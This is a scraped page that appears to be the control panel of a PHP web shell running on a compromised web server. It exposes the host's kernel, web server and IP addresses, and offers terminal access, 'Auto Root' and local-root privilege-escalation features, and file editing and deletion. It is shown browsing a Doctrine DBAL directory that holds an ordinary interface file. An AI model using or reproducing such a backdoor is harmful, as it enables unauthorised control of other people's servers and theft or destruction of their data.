Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.152.124
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
doctrine /
dbal /
src /
Driver /
API /
Delete
Unzip
Name
Size
Permission
Date
Action
IBMDB2
[ DIR ]
drwxrwxr-x
2022-08-21 14:21
MySQL
[ DIR ]
drwxrwxr-x
2022-08-21 14:21
OCI
[ DIR ]
drwxrwxr-x
2022-08-21 14:21
PostgreSQL
[ DIR ]
drwxrwxr-x
2022-08-21 14:21
SQLSrv
[ DIR ]
drwxrwxr-x
2022-08-21 14:21
SQLite
[ DIR ]
drwxrwxr-x
2022-08-21 14:21
ExceptionConverter.php
846
B
-rw-rw-r--
2022-08-21 14:21
Save
Rename
<?php declare(strict_types=1); namespace Doctrine\DBAL\Driver\API; use Doctrine\DBAL\Driver\Exception; use Doctrine\DBAL\Exception\DriverException; use Doctrine\DBAL\Query; interface ExceptionConverter { /** * Converts a given driver-level exception into a DBAL-level driver exception. * * Implementors should use the vendor-specific error code and SQLSTATE of the exception * and instantiate the most appropriate specialized {@see DriverException} subclass. * * @param Exception $exception The driver exception to convert. * @param Query|null $query The SQL query that triggered the exception, if any. * * @return DriverException An instance of {@see DriverException} or one of its subclasses. */ public function convert(Exception $exception, ?Query $query): DriverException; }